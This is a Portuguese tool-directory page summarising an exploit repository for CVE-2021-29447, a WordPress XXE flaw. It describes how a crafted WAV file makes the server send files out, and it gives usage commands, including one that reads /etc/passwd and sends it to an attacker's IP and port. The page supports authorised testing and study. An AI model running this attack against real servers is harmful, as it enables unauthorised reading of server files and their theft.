Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-29447 — Exploit para CVE-2021-29447, uma vulnerabilidade XXE no WordPress 5.7.0 e anteriores. Gera payloads WAV maliciosos para ler arquivos arbitrários do servidor via injeção de entidade externa XML. Inclui ambiente de teste Docker. | Kitploit
Ferramentas/GitHubGitHub/danilo1992-sys/cve-2021-29447
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubdanilo1992-sys/cve-2021-29447

CVE-2021-29447

Exploit para CVE-2021-29447, uma vulnerabilidade XXE no WordPress 5.7.0 e anteriores. Gera payloads WAV maliciosos para ler arquivos arbitrários do servidor via injeção de entidade externa XML. Inclui ambiente de teste Docker.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 5 mesesAinda não revisado

CVE-2021-29447 - Exploit da Vulnerabilidade XXE no WordPress

Descrição

Este repositório contém um exploit para CVE-2021-29447, uma vulnerabilidade de XXE (XML External Entity) presente no WordPress 5.7.0 e versões anteriores. A vulnerabilidade existe na biblioteca multimídia que processa arquivos WAV, permitindo a um atacante ler arquivos arbitrários do servidor.

Requisitos

  • Bash
  • Python 3
  • Docker e Docker Compose (para levantar ambiente de teste)
  • Servidor WordPress vulnerável (5.7.0 ou inferior)

Arquivos

ArquivoDescrição
CVE-2021-29447.shScript de exploração que gera o payload WAV e arquivo DTD malicioso
decode.phpScript PHP para decodificar dados exfiltrados (base64 + zlib)
docker-compose.ymlAmbiente Docker com WordPress vulnerável para testes

Uso

1. Levantar ambiente de teste

root@kitploit:~
docker-compose up -d

2. Executar exploit

root@kitploit:~
chmod +x CVE-2021-29447.sh
./CVE-2021-29447.sh -l <LHOST> -p <LPORT> -f <arquivo_objetivo>

Parâmetros:

  • -l IP do atacante (LHOST)
  • -p Porta do atacante (LPORT)
  • -f Caminho do arquivo a ler no servidor
  • -h Mostrar ajuda

Exemplo:

root@kitploit:~
./CVE-2021-29447.sh -l 192.168.1.100 -p 4444 -f /etc/passwd

3. Decodificar dados

Os dados exfiltrados virão codificados em base64 e comprimidos com zlib. Para decodificá-los:

root@kitploit:~
php decode.php

Técnica

O exploit funciona inserindo uma entidade externa XXE nos metadados de um arquivo WAV. Quando o WordPress processa o arquivo, o parser XML resolve a entidade externa, fazendo com que o servidor faça uma requisição HTTP ao servidor do atacante com o conteúdo do arquivo codificado na URL.

Referências

  • CVE-2021-29447
  • WordPress 5.7.0 Security Release

Aviso

Este código é apenas para fins educacionais e de testes de penetração autorizados. Não utilize em sistemas sem autorização explícita.

Baixar ferramenta